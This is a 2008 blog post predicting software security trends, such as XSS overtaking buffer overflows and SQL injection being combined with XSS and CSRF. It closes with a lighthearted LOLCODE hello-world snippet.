
Top 5 Software Security Predictions for 2008
1. More Software Security Vendor Acquisitions
As the industry matures there will be more consolidation. As larger mainstream vendors buy up software security companies that will give software security tools further distribution, but it will not necessarily result in deeper adoption as adoption up until now has been significantly driven by independent vendor evangelism.
2. Cross Site Scripting is the New Buffer Overflow
Buffer overflows used to allow attackers to run arbitrary code on servers, where valuable data lived. Now that most new server side applications are being written in safer languages such as .NET and Java buffer overflows are on the decline (See the changes between the OWASP Top 10 2004 and Top 10 2007). With Web 2.0 and other trends moving more data onto the client side, hosted in browsers, the ability to run malicious code in client browsers (XSS) will become paramount for attackers. Also cross site scripting as a class of problem encompasses many subtle variations that will persist even when obvious XSS flaws have been addressed – just like we saw with buffer overflows at attackers moved from stack overflows to heap overflows to format string attacks.
3. More Combined Attacks on the Horizon
General awareness of software security issues has improved in recent years. Most developers these days have at least heard of SQL injection attacks, and tool adoption by large organizations has started to stem the tide of SQL injection and other simple vulnerabilities from high-profile and critical applications. As these individual pieces become more secure, attackers will start to look for more subtle attacks. These will involve combining different attack vectors such as SQL injection and Cross Site Scripting (XSS) The recent mass SQL injection attack that injected malicious HTML and JavaScript into databases is a good example and is a harbinger of things to come. Also, using Cross Site Request Forgery (CSRF) attacks to weave attacks across separate applications will continue to gain steam. As the components become more mature, more vulnerabilities will come from the interactions between these components.
4. Academia Will Start to Get In On the Act
Up to this point there has been comparatively limited work done in academia that was specifically focused on software security. In 2008 I suspect several prominent institutions will announce software security-specific efforts. This is great because it will hopefully start the long road toward security being taught throughout the computer science curriculum rather than as specialized add-on coursework.
5. Social Networking is Going to Have a Rough Year
With so many people becoming involved in multiple Social Networking sites, so much valuable personal data being stored in those sites and with increased programmability being made available, vulnerabilities will skyrocket as threats and countermeasures in this environment are not well understood.
2007 was a tremendously exciting year for application security and I think 2008 is going to blow it away. Tremendous strides have been made in education, testing and countermeasures but equal if not more progress has been made by attackers as they evolve their methods and – even more importantly – their goals.
–Dan
PS – Picture is another I took in Costa Rica. It has been LOLGuana-ed up solely to aggravate Sheridan Chambers, who hates LOLCats more than anyone I know. Even I’m getting annoyed so I guess I ought to lay off for a while.
Have you seen lolcode.com?
The requisite “hello world” is below.
HAI
CAN HAS STDIO?
VISIBLE “HAI WORLD!”
KTHXBYE